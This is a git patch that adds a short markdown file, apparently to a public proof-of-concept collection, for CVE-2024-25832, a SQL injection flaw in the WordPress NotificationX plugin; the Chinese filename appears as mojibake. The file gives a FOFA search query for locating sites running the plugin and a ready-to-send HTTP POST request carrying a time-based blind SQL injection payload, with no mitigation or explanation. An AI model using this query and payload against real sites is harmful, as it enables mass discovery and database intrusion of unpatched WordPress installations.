From a53115d03cad1b2c2e4cc4042672080a9925d672 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 28 Apr 2024 20:27:08 +0800 Subject: [PATCH] =?UTF-8?q?Create=20WordPress=E6=8F=92=E4=BB=B6Notificatio?= =?UTF-8?q?nX=E5=AD=98=E5=9C=A8sql=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(CVE?= =?UTF-8?q?-2024-25832).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...¶NotificationX存在sqlæ³¨å…¥æ¼æ´ž(CVE-2024-25832).md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 WordPressæ’ä»¶NotificationX存在sqlæ³¨å…¥æ¼æ´ž(CVE-2024-25832).md diff --git a/WordPressæ’ä»¶NotificationX存在sqlæ³¨å…¥æ¼æ´ž(CVE-2024-25832).md b/WordPressæ’ä»¶NotificationX存在sqlæ³¨å…¥æ¼æ´ž(CVE-2024-25832).md new file mode 100644 index 0000000..efd6b3e --- /dev/null +++ b/WordPressæ’ä»¶NotificationX存在sqlæ³¨å…¥æ¼æ´ž(CVE-2024-25832).md @@ -0,0 +1,15 @@ +## WordPressæ’ä»¶NotificationX存在sqlæ³¨å…¥æ¼æ´ž(CVE-2024-25832) + +## fofa +``` +body="/wp-content/plugins/notificationx" +``` + +## poc +``` +POST /wp-json/notificationx/v1/analytics HTTP/1.1 +Host: +Content-Type: application/json + +{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"} +```